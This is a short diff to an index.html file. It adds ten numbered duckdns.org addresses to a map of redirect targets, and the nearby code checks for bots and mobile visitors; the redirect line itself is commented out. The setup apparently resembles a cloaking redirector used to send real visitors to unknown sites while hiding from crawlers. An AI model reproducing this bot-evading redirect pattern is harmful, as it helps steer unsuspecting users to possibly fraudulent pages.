--- a/index.html
+++ b/index.html
@@ -290,6 +290,16 @@
                 "Active18": "https://643876227648.duckdns.org",
                 "Active19": "https://643876227649.duckdns.org",
                 "Active20": "https://643876227650.duckdns.org",
+		"Secure01": "https://6566601.duckdns.org",
+                "Secure02": "https://6566602.duckdns.org",
+                "Secure03": "https://6566603.duckdns.org",
+                "Secure04": "https://6566604.duckdns.org",
+                "Secure05": "https://6566605.duckdns.org",
+                "Secure06": "https://6566606.duckdns.org",
+                "Secure07": "https://6566607.duckdns.org",
+                "Secure08": "https://6566608.duckdns.org",
+                "Secure09": "https://6566609.duckdns.org",
+                "Secure10": "https://6566610.duckdns.org",
             };
             if (!is_bot && is_MIbile) {
                 //window.location.href = links[code];
